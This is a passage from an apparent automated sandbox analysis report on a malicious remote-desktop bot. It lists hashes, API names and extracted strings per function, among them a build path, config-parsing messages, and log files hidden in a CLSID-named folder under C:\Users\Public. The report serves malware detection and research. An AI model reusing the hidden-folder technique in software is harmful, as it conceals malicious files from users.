                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 58423ba29739921012416d05e5dbc1509c7eb61d3be863f7a2f3912cda20af73
                                                                                                                                                  • Instruction ID: ba875c8e43ea3cc856875f75497227ea4a52b77d27b5d8b1ba02779c9c239d61
                                                                                                                                                  • Opcode Fuzzy Hash: 58423ba29739921012416d05e5dbc1509c7eb61d3be863f7a2f3912cda20af73
                                                                                                                                                  • Instruction Fuzzy Hash: 1A21AB62A08BC396E6129F1CF8407AA3765BB857C8F454032EF8C47665DF3CE985E700
                                                                                                                                                  Function 00007FF8B9189004 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 7feb5f99be34bff91d77dfd5db5aa2204c62c6314b7ac8121db4399c85ba9e29
                                                                                                                                                  • Instruction ID: fb7d2605498d6a04d36d5840b025d926639e05d7b175cbdbc1f31ad4bcf1e0b0
                                                                                                                                                  • Opcode Fuzzy Hash: 7feb5f99be34bff91d77dfd5db5aa2204c62c6314b7ac8121db4399c85ba9e29
                                                                                                                                                  • Instruction Fuzzy Hash: E6217A22A08A8696F6219F19F8807AA77A5BB447D4F444032EF4C47766DF3DD986F700
                                                                                                                                                  Function 00007FF8BFB58AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                                                                                                                                                  • Instruction ID: b0de49f1424ae57908a201f7c79efa8160a963368e0d18f1f08b488ea54e4b06
                                                                                                                                                  • Opcode Fuzzy Hash: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                                                                                                                                                  • Instruction Fuzzy Hash: 5F217C62A09A86A5E7119F99FC50BAA7365FB447C4F444032EF4C47764DF3CE995C700
                                                                                                                                                  Function 00007FF8BFB394F4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 591d9c77f18678ec0f49fccd3905a1aec4a9850be8c5e59c2f1693f793faafe9
                                                                                                                                                  • Instruction ID: 1bab018105bea4cf9faea3f52642eab5306698a17a64a2658a3b7775e460746f
                                                                                                                                                  • Opcode Fuzzy Hash: 591d9c77f18678ec0f49fccd3905a1aec4a9850be8c5e59c2f1693f793faafe9
                                                                                                                                                  • Instruction Fuzzy Hash: 8E217762A48A4796E6219F99FC407AA7365FB847C4F484032EF8C47764CF3CE885CB00
                                                                                                                                                  Function 00007FF8BFB8CA74 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 86f798423a90631b684bbec975e772917ddb9f341768e14ebb927b92ead05de6
                                                                                                                                                  • Instruction ID: 1b2a34692f54fe5f1fdebf2969dc601f2bd5b56e31d2b2d2b822f3f7aca0edf6
                                                                                                                                                  • Opcode Fuzzy Hash: 86f798423a90631b684bbec975e772917ddb9f341768e14ebb927b92ead05de6
                                                                                                                                                  • Instruction Fuzzy Hash: EE217CA2A09A4696E6519F9DFC407AA73A0FB887D4F848036EF4C477A5DF3CE945C700
                                                                                                                                                  Function 00007FF8BA4F7590 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  • API String ID: 1004003707-2568489879
                                                                                                                                                  • Opcode ID: 1a184603a095c2785f17211911e662ef83ed393e3036cf695f0e3083be6901ce
                                                                                                                                                  • Instruction ID: d8ce18eed5f4ebe553d0867d6246418b097da0a32ea0bc6489cda94370ccb6ac
                                                                                                                                                  • Opcode Fuzzy Hash: 1a184603a095c2785f17211911e662ef83ed393e3036cf695f0e3083be6901ce
                                                                                                                                                  • Instruction Fuzzy Hash: 1E41F761E0C647D6FA208B9CED903B82360BB153D8F8495B6DF4D469A5EFBDA649C300
                                                                                                                                                  Function 00007FF8BFB38FD0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  • API String ID: 1004003707-2568489879
                                                                                                                                                  • Opcode ID: 6b049bc3d6c029a052e072fb1fc95993046fbce77934b4af55192470ce624f2e
                                                                                                                                                  • Instruction ID: 52751eb6c13eae313cd15a7c400c7973b82dbdbea2a3fafa2328b6c9caba442d
                                                                                                                                                  • Opcode Fuzzy Hash: 6b049bc3d6c029a052e072fb1fc95993046fbce77934b4af55192470ce624f2e
                                                                                                                                                  • Instruction Fuzzy Hash: 6D4149A2A88A47A1FA249BD9EA413F46361FF443C8F8C4032DB5C16694DF7DEA55D300
                                                                                                                                                  Function 00007FF8BA4F7409 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-3977765790
                                                                                                                                                  • Opcode ID: 3d6d22d10641deace307fba5547bc6261cfc25d0abbb71d060340f09f2567f54
                                                                                                                                                  • Instruction ID: 79ce789dc91baa002e40eac62809ad50493e68f0cf935a9a425e1fa2de08ba50
                                                                                                                                                  • Opcode Fuzzy Hash: 3d6d22d10641deace307fba5547bc6261cfc25d0abbb71d060340f09f2567f54
                                                                                                                                                  • Instruction Fuzzy Hash: 54412E61A0C547D5FA208B9CEC903B82350BF113C8F84A0B6DF4D569A5EFBDE64AD300
                                                                                                                                                  Function 00007FF8B9188959 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-3977765790
                                                                                                                                                  • Opcode ID: bbd8d863d0c2393a798718cc76c9459790273a858cadf82e92e436848f4ab38c
                                                                                                                                                  • Instruction ID: 7b27ca96c6272c38e14ce30cf6208caefe170f999f47ff984c3b7d6dc462309e
                                                                                                                                                  • Opcode Fuzzy Hash: bbd8d863d0c2393a798718cc76c9459790273a858cadf82e92e436848f4ab38c
                                                                                                                                                  • Instruction Fuzzy Hash: 8A411A62A185C7A5FA209F5CE8807F463A1AB003C8F598532DB6D465D7EF3CA946F300
                                                                                                                                                  Function 00007FF8BFB38E49 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-3977765790
                                                                                                                                                  • Opcode ID: a5c6423a5378826f41d1e00e337d869f499e52ea9b23018924f27b0ddc25a9b7
                                                                                                                                                  • Instruction ID: 2a28d82c6cb590ef85477cc0fe020d1a049c09cdef09f991c26a017c5eb5895c
                                                                                                                                                  • Opcode Fuzzy Hash: a5c6423a5378826f41d1e00e337d869f499e52ea9b23018924f27b0ddc25a9b7
                                                                                                                                                  • Instruction Fuzzy Hash: 7E414AA3AC9647A1FA149BD8EA407B42361BF443C8F4C4436EB1C0B5A5DF7CE95AE311
                                                                                                                                                  Function 00007FF6BE03824D Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                                                                                                                                  • API String ID: 39653677-1686225151
                                                                                                                                                  • Opcode ID: 991dd80c700aa1ae76ec81c81c963b3872b3b5c0a8959d8b97ae4b1278808ee7
                                                                                                                                                  • Instruction ID: d6060e327527507955775ac298ce42d30f8dca50aa94c2607e2882025dfe5ea7
                                                                                                                                                  • Opcode Fuzzy Hash: 991dd80c700aa1ae76ec81c81c963b3872b3b5c0a8959d8b97ae4b1278808ee7
                                                                                                                                                  • Instruction Fuzzy Hash: 6C21BF12A0CF4285FB355A2EA914B7E56919B7D7C8F084170FB4E9B3D2DE2CE8718350
                                                                                                                                                  Function 00007FF8BA4F1292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                                                                                                                                  • API String ID: 513531256-2601447032
                                                                                                                                                  • Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                                                                                                                                                  • Instruction ID: 48ae292735d9fc679e6925ffdb90221cac906dd5d8ed1525729790f77bb759b6
                                                                                                                                                  • Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                                                                                                                                                  • Instruction Fuzzy Hash: 7E415E61A0C681C6F3309B9DECA43A92261BB9B7C4F4400B6DF4D87AA5CF2DE6458700
                                                                                                                                                  Function 00007FF8B9151292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                                                                                                                                  • API String ID: 513531256-2115573132
                                                                                                                                                  • Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                                                                                                                                                  • Instruction ID: e53a5fb9558cbbbc1d3acd7d4ae9cdab037c85f043cb7140463db60464642fe5
                                                                                                                                                  • Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                                                                                                                                                  • Instruction Fuzzy Hash: 03417E75E0D6C286F322AF19E8643B96361AB897C0F444031DB4D87B95CF7CE586E740
                                                                                                                                                  Function 00007FF8B9181292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
                                                                                                                                                  • API String ID: 513531256-1022500615
                                                                                                                                                  • Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                                                                                                                                                  • Instruction ID: 15cc3d0b5a60226fdfc4e58b4d97cdd2c4676b62474891348f41eafe1da1afa4
                                                                                                                                                  • Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                                                                                                                                                  • Instruction Fuzzy Hash: F4418B62A0C6C186F3209F19E8503F963A4FB9A7D0F854130DB0D57B96DF3DE986A704
                                                                                                                                                  Function 00007FF8BFB52FD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
